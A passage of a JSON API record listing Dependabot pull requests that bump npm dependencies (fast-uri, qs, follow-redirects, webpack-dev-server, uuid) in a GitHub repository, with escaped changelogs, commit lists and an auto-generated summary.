href=\"https://redirect.github.com/fastify/fast-uri/pull/162\"\u003efastify/fast-uri#162\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/fastify/fast-uri/compare/v3.1.0...v3.1.1\"\u003ehttps://github.com/fastify/fast-uri/compare/v3.1.0...v3.1.1\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/919dd8ea7689fcc220d0d9b71307f5095e723ef9\"\u003e\u003ccode\u003e919dd8e\u003c/code\u003e\u003c/a\u003e Bumped v3.1.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/c65ba573714af6b8e19e481d9444c27bc4355d07\"\u003e\u003ccode\u003ec65ba57\u003c/code\u003e\u003c/a\u003e fixup: linting\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/6c86c17c3d76fb93aa3700ec6c0fa00faeb97293\"\u003e\u003ccode\u003e6c86c17\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/a95158ad308df4d92bbde4eba699ce5165e9f796\"\u003e\u003ccode\u003ea95158a\u003c/code\u003e\u003c/a\u003e Handle malformed fragment decoding without throwing (\u003ca href=\"https://redirect.github.com/fastify/fast-uri/issues/171\"\u003e#171\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/cea547c91c6aae610041b17b75792ca4aa035a6d\"\u003e\u003ccode\u003ecea547c\u003c/code\u003e\u003c/a\u003e Bumped v3.1.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/876ce79b662c3e5015e4e7dffe6f37752ad34f35\"\u003e\u003ccode\u003e876ce79\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/dcdf690b71a7bb3a19887ada65a9ab160d83bcc0\"\u003e\u003ccode\u003edcdf690\u003c/code\u003e\u003c/a\u003e ci: add lock-threads workflow (\u003ca href=\"https://redirect.github.com/fastify/fast-uri/issues/169\"\u003e#169\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/c860e6589b1ac346f66e114b4eadb9613768108c\"\u003e\u003ccode\u003ec860e65\u003c/code\u003e\u003c/a\u003e build(deps-dev): bump neostandard from 0.12.2 to 0.13.0 (\u003ca href=\"https://redirect.github.com/fastify/fast-uri/issues/167\"\u003e#167\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/9b4c6dc82fde0ca44e674403ece9185d85bb6d5f\"\u003e\u003ccode\u003e9b4c6dc\u003c/code\u003e\u003c/a\u003e build(deps): bump fastify/workflows/.github/workflows/plugins-ci.yml (\u003ca href=\"https://redirect.github.com/fastify/fast-uri/issues/166\"\u003e#166\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/fastify/fast-uri/commit/85d09a9f7aa76b32c2bb005a90a71e144c361d24\"\u003e\u003ccode\u003e85d09a9\u003c/code\u003e\u003c/a\u003e build(deps): bump fastify/workflows/.github/workflows/plugins-ci-package-mana...\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/fastify/fast-uri/compare/v3.1.0...v3.1.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `follow-redirects` from 1.15.11 to 1.16.0\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/0c23a223067201c368035e82954c11eb2578a33b\"\u003e\u003ccode\u003e0c23a22\u003c/code\u003e\u003c/a\u003e Release version 1.16.0 of the npm package.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/844c4d302ac963d29bdb5dc1754ec7df3d70d7f9\"\u003e\u003ccode\u003e844c4d3\u003c/code\u003e\u003c/a\u003e Add sensitiveHeaders option.\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/5e8b8d024e2c76f804a284258e585ecb49a575be\"\u003e\u003ccode\u003e5e8b8d0\u003c/code\u003e\u003c/a\u003e ci: add Node.js 24.x to the CI matrix\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/7953e2255aa0b93602eed3804f3bc5e6923a03af\"\u003e\u003ccode\u003e7953e22\u003c/code\u003e\u003c/a\u003e ci: upgrade GitHub Actions to use setup-node@v6 and checkout@v6\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/follow-redirects/follow-redirects/commit/86dc1f86e4b56bcd642c78384d51f10f123aea75\"\u003e\u003ccode\u003e86dc1f8\u003c/code\u003e\u003c/a\u003e Sanitizing input.\u003c/li\u003e\n\u003cli\u003eSee full diff in \u003ca href=\"https://github.com/follow-redirects/follow-redirects/compare/v1.15.11...v1.16.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `qs` from 6.14.2 to 6.15.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/ljharb/qs/blob/main/CHANGELOG.md\"\u003eqs's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003cstrong\u003e6.15.2\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined entries in \u003ccode\u003earrayFormat: 'comma'\u003c/code\u003e + \u003ccode\u003eencodeValuesOnly\u003c/code\u003e instead of crashing in \u003ccode\u003eencoder\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: use configured \u003ccode\u003edelimiter\u003c/code\u003e after \u003ccode\u003echarsetSentinel\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/555\"\u003e#555\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: apply \u003ccode\u003eformatter\u003c/code\u003e to encoded key under \u003ccode\u003estrictNullHandling\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/554\"\u003e#554\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined filter-array entries instead of crashing in \u003ccode\u003eencoder\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/551\"\u003e#551\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: handle nested bracket groups and add regression tests (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/530\"\u003e#530\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] fix grammar (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/550\"\u003e#550\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] add regression tests for keys containing percent-encoded bracket text\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.15.1\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: \u003ccode\u003eparameterLimit: Infinity\u003c/code\u003e with \u003ccode\u003ethrowOnLimitExceeded: true\u003c/code\u003e silently drops all parameters\u003c/li\u003e\n\u003cli\u003e[Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e, \u003ccode\u003eiconv-lite\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Tests] increase coverage\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.15.0\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[New] \u003ccode\u003eparse\u003c/code\u003e: add \u003ccode\u003estrictMerge\u003c/code\u003e option to wrap object/primitive conflicts in an array (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/425\"\u003e#425\u003c/a\u003e, \u003ca href=\"https://redirect.github.com/ljharb/qs/issues/122\"\u003e#122\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eduplicates\u003c/code\u003e option should not apply to bracket notation keys (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/514\"\u003e#514\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/9aca4076fe788338c67cf7e115f0be6bc58d85a8\"\u003e\u003ccode\u003e9aca407\u003c/code\u003e\u003c/a\u003e v6.15.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/5e33d33447ed0bf1ddab9abc41d27dea4687d992\"\u003e\u003ccode\u003e5e33d33\u003c/code\u003e\u003c/a\u003e [Dev Deps] update \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/21f80b33e5c8b3f7eba1034fff0da4a4a37a1d41\"\u003e\u003ccode\u003e21f80b3\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined entries in \u003ccode\u003earrayFormat: 'comma'\u003c/code\u003e + `e...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/a0a81ea2071acce3eff41a040f719ac8f5c4f64c\"\u003e\u003ccode\u003ea0a81ea\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: use configured \u003ccode\u003edelimiter\u003c/code\u003e after \u003ccode\u003echarsetSentinel\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/e3062f78f5233b338ceeb8e8dfa5a07dea4b32a8\"\u003e\u003ccode\u003ee3062f7\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: apply \u003ccode\u003eformatter\u003c/code\u003e to encoded key under \u003ccode\u003estrictNullHandling\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/0c180a40adb8c6703fffc85b2ff06ca209f5c1e0\"\u003e\u003ccode\u003e0c180a4\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003estringify\u003c/code\u003e: skip null/undefined filter-array entries instead of crashi...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/3a8b94aec19bd664720f6f6b1e66c4a0dfe4b656\"\u003e\u003ccode\u003e3a8b94a\u003c/code\u003e\u003c/a\u003e [Tests] add regression tests for keys containing percent-encoded bracket text\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/96755abd357c0e534dd3442a84a04d08864bfe0d\"\u003e\u003ccode\u003e96755ab\u003c/code\u003e\u003c/a\u003e [readme] fix grammar\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/a419ce5bbfcdb98a299f1a0bb47ea055baef20e6\"\u003e\u003ccode\u003ea419ce5\u003c/code\u003e\u003c/a\u003e [Fix] \u003ccode\u003eparse\u003c/code\u003e: handle nested bracket groups and add regression tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/ljharb/qs/commit/3f5e1c528c967d915096787efbffa73cf6044170\"\u003e\u003ccode\u003e3f5e1c5\u003c/code\u003e\u003c/a\u003e v6.15.1\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/ljharb/qs/compare/v6.14.2...v6.15.2\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\n\nDependabot will resolve any conflicts with this PR as long as you don't alter it yourself. You can also trigger a rebase manually by commenting `@dependabot rebase`.\n\n[//]: # (dependabot-automerge-start)\n[//]: # (dependabot-automerge-end)\n\n---\n\n\u003cdetails\u003e\n\u003csummary\u003eDependabot commands and options\u003c/summary\u003e\n\u003cbr /\u003e\n\nYou can trigger Dependabot actions by commenting on this PR:\n- `@dependabot rebase` will rebase this PR\n- `@dependabot recreate` will recreate this PR, overwriting any edits that have been made to it\n- `@dependabot show \u003cdependency name\u003e ignore conditions` will show all of the ignore conditions of the specified dependency\n- `@dependabot ignore \u003cdependency name\u003e major version` will close this group update PR and stop Dependabot creating any more for the specific dependency's major version (unless you unignore this specific dependency's major version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e minor version` will close this group update PR and stop Dependabot creating any more for the specific dependency's minor version (unless you unignore this specific dependency's minor version or upgrade to it yourself)\n- `@dependabot ignore \u003cdependency name\u003e` will close this group update PR and stop Dependabot creating any more for the specific dependency (unless you unignore this specific dependency or upgrade to it yourself)\n- `@dependabot unignore \u003cdependency name\u003e` will remove all of the ignore conditions of the specified dependency\n- `@dependabot unignore \u003cdependency name\u003e \u003cignore condition\u003e` will remove the ignore condition of the specified dependency and ignore conditions\nYou can disable automated security fix PRs for this repo from the [Security Alerts page](https://github.com/Wbaker7702/nemo/network/alerts).\n\n\u003c/details\u003e\n\n\u003c!-- This is an auto-generated description by cubic. --\u003e\n---\n## Summary by cubic\nUpgrade build/dev dependencies to pick up security fixes and improve the dev server. No app code changes; updates are patch-level and safe.\n\n- **Dependencies**\n  - `postcss` → 8.5.10: fixes XSS in non-bundler output; source map improvements.\n  - `webpack-dev-server` → 5.2.4: sets Cross-Origin-Resource-Policy header; overlay ESC to dismiss; upgrades `selfsigned`. Transitive bumps include `express` 4.22.2, `compression` 1.8.1, and `body-parser` 1.20.5.\n  - Security/bug fixes: `fast-uri` 3.1.2, `qs` 6.15.2, `follow-redirects` 1.16.0.\n  - `@babel/plugin-transform-modules-systemjs` → 7.29.7: module name and source map fixes.\n\n\u003csup\u003eWritten for commit 6bf6b7d363fab9b90487d84a7869a9671e696817. Summary will update on new commits.\u003c/sup\u003e\n\n\u003ca href=\"https://cubic.dev/pr/Wbaker7702/nemo/pull/238?utm_source=github\"\u003eReview in cubic\u003c/a\u003e\n\n\u003c!-- End of auto-generated description by cubic. --\u003e\n\n","html_url":"https://github.com/Wbaker7702/nemo/pull/238","url":"https://dependabot.ecosyste.ms/api/v1/hosts/GitHub/repositories/Wbaker7702%2Fnemo/issues/238","packages_url":"https://dependabot.ecosyste.ms/api/v1/issues/238/packages"},{"uuid":"4537547743","node_id":"PR_kwDOMake787gFfWh","number":129,"state":"closed","title":"Bump the npm_and_yarn group across 6 directories with 9 updates","user":"dependabot[bot]","labels":["dependencies","javascript"],"assignees":[],"locked":false,"comments_count":1,"pull_request":true,"closed_at":"2026-05-30T06:11:25.000Z","author_association":null,"state_reason":null,"created_at":"2026-05-28T03:38:29.000Z","updated_at":"2026-05-30T06:11:27.000Z","time_to_close":181976,"merged_at":null,"merged_by":null,"closed_by":null,"dependency_metadata":{"prefix":"Bump","group_name":"npm_and_yarn","update_count":9,"packages":[{"name":"webpack-dev-server","old_version":"5.2.2","new_version":"5.2.4","repository_url":"https://github.com/webpack/webpack-dev-server"},{"name":"uuid","old_version":"13.0.0","new_version":"14.0.0","repository_url":"https://github.com/uuidjs/uuid"},{"name":"@xmldom/xmldom","old_version":"0.8.12","new_version":"0.8.13","repository_url":"https://github.com/xmldom/xmldom"},{"name":"@babel/plugin-transform-modules-systemjs","old_version":"7.23.3","new_version":"7.29.7","repository_url":"https://github.com/babel/babel"},{"name":"bn.js","old_version":"4.12.0","new_version":"4.12.3","repository_url":"https://github.com/indutny/bn.js"},{"name":"fast-uri","old_version":"3.0.6","new_version":"3.1.2","repository_url":"https://github.com/fastify/fast-uri"},{"name":"ip-address","old_version":"10.0.1","new_version":"10.2.0","repository_url":"https://github.com/beaugunderson/ip-address"},{"name":"qs","old_version":"6.11.2","new_version":"6.13.0","repository_url":"https://github.com/ljharb/qs"},{"name":"tmp","old_version":"0.2.5","new_version":"0.2.7","repository_url":"https://github.com/raszi/node-tmp"}],"path":null,"ecosystem":"npm"},"body":"Bumps the npm_and_yarn group with 9 updates in the / directory:\n\n| Package | From | To |\n| --- | --- | --- |\n| [webpack-dev-server](https://github.com/webpack/webpack-dev-server) | `5.2.2` | `5.2.4` |\n| [uuid](https://github.com/uuidjs/uuid) | `13.0.0` | `14.0.0` |\n| [@xmldom/xmldom](https://github.com/xmldom/xmldom) | `0.8.12` | `0.8.13` |\n| [@babel/plugin-transform-modules-systemjs](https://github.com/babel/babel/tree/HEAD/packages/babel-plugin-transform-modules-systemjs) | `7.23.3` | `7.29.7` |\n| [bn.js](https://github.com/indutny/bn.js) | `4.12.0` | `4.12.3` |\n| [fast-uri](https://github.com/fastify/fast-uri) | `3.0.6` | `3.1.2` |\n| [ip-address](https://github.com/beaugunderson/ip-address) | `10.0.1` | `10.2.0` |\n| [qs](https://github.com/ljharb/qs) | `6.11.2` | `6.13.0` |\n| [tmp](https://github.com/raszi/node-tmp) | `0.2.5` | `0.2.7` |\n\nBumps the npm_and_yarn group with 1 update in the /benchmark directory: [webpack-dev-server](https://github.com/webpack/webpack-dev-server).\nBumps the npm_and_yarn group with 1 update in the /packages/studio-base directory: [uuid](https://github.com/uuidjs/uuid).\nBumps the npm_and_yarn group with 2 updates in the /packages/studio-desktop directory: [webpack-dev-server](https://github.com/webpack/webpack-dev-server) and [@xmldom/xmldom](https://github.com/xmldom/xmldom).\nBumps the npm_and_yarn group with 1 update in the /packages/studio-web directory: [webpack-dev-server](https://github.com/webpack/webpack-dev-server).\nBumps the npm_and_yarn group with 1 update in the /web directory: [webpack-dev-server](https://github.com/webpack/webpack-dev-server).\n\nUpdates `webpack-dev-server` from 5.2.2 to 5.2.4\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/releases\"\u003ewebpack-dev-server's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev5.2.4\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev5.2.3\u003c/h2\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/webpack/webpack-dev-server/blob/main/CHANGELOG.md\"\u003ewebpack-dev-server's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.3...v5.2.4\"\u003e5.2.4\u003c/a\u003e (2026-05-11)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eset Cross-Origin-Resource-Policy header to prevent source code theft over HTTP\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.3\"\u003e5.2.3\u003c/a\u003e (2026-01-12)\u003c/h3\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003ecause\u003c/code\u003e for \u003ccode\u003eerrorObject\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5518\"\u003e#5518\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/37b033da2c48335178495a1987c469a26ef3de60\"\u003e37b033d\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003ecompatibility with event target and universal target and lazy compilation  (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/574026c44b9c51f0bbd2f5a2836c54607289a071\"\u003e574026c\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003eoverlay:\u003c/strong\u003e add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003ef91baa8\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eprogress indicator styles (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5557\"\u003e#5557\u003c/a\u003e) (\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/41a53a1accdb0a90785d82cbe8a079794eeed3c8\"\u003e41a53a1\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eupgrade selfsigned to v5\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/fd401308f1cc026262880e2dab810004d6444282\"\u003e\u003ccode\u003efd40130\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.4\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/ece4f3617bea31fb6d3833f69a32b6c289959a49\"\u003e\u003ccode\u003eece4f36\u003c/code\u003e\u003c/a\u003e chore: update deps (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5661\"\u003e#5661\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/a2161442a314a06a97e25d1404d08410cb4e9c51\"\u003e\u003ccode\u003ea216144\u003c/code\u003e\u003c/a\u003e ci: fix test (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5658\"\u003e#5658\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/df073c53a8cefb54210b43813fa6ee60364a554e\"\u003e\u003ccode\u003edf073c5\u003c/code\u003e\u003c/a\u003e Merge commit from fork\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/b550a702bd4246d1724513b70de0bfbe6604672f\"\u003e\u003ccode\u003eb550a70\u003c/code\u003e\u003c/a\u003e chore(release): 5.2.3\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/9704dc52e3f696ae1446428c25882745e9b65cbb\"\u003e\u003ccode\u003e9704dc5\u003c/code\u003e\u003c/a\u003e chore: upgrade selfsigned to v5 and remove node-forge dependency (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5618\"\u003e#5618\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/92bf644784741e8ea5adaa4a1dc26f4d462f223d\"\u003e\u003ccode\u003e92bf644\u003c/code\u003e\u003c/a\u003e chore: bump express to update qs (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5621\"\u003e#5621\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/792b2f0bd13a3b93abf701fe3a5cf41ee16722f4\"\u003e\u003ccode\u003e792b2f0\u003c/code\u003e\u003c/a\u003e chore(deps-dev): bump the dependencies group with 4 updates (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5606\"\u003e#5606\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/6d587cab3e023675de2feedf81bcdfcec7d5b774\"\u003e\u003ccode\u003e6d587ca\u003c/code\u003e\u003c/a\u003e chore(deps): bump the dependencies group across 1 directory with 27 updates (...\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/webpack/webpack-dev-server/commit/f91baa8831e061e2998849966b8002b40b83fb07\"\u003e\u003ccode\u003ef91baa8\u003c/code\u003e\u003c/a\u003e fix(overlay): add ESC key to dismiss overlay (\u003ca href=\"https://redirect.github.com/webpack/webpack-dev-server/issues/5598\"\u003e#5598\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/webpack/webpack-dev-server/compare/v5.2.2...v5.2.4\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `uuid` from 13.0.0 to 14.0.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/uuidjs/uuid/releases\"\u003euuid's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev14.0.0\u003c/h2\u003e\n\u003ch2\u003e\u003ca href=\"https://github.com/uuidjs/uuid/compare/v13.0.0...v14.0.0\"\u003e14.0.0\u003c/a\u003e (2026-04-19)\u003c/h2\u003e\n\u003ch3\u003e⚠ BREAKING CHANGES\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eexpect \u003ccode\u003ecrypto\u003c/code\u003e to be global everywhere (requires node@20+) (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/935\"\u003e#935\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edrop node@18 support (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/934\"\u003e#934\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eFeatures\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003edrop node@18 support (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/934\"\u003e#934\u003c/a\u003e) (\u003ca href=\"https://github.com/uuidjs/uuid/commit/dc4ddb87272ed2843faccd130bcc41d492688bd3\"\u003edc4ddb8\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003eBug Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eexpect \u003ccode\u003ecrypto\u003c/code\u003e to be global everywhere (requires node@20+) (\u003ca href=\"https://redirect.github.com/uuidjs/uuid/issues/935\"\u003e#935\u003c/a\u003e) (\u003ca 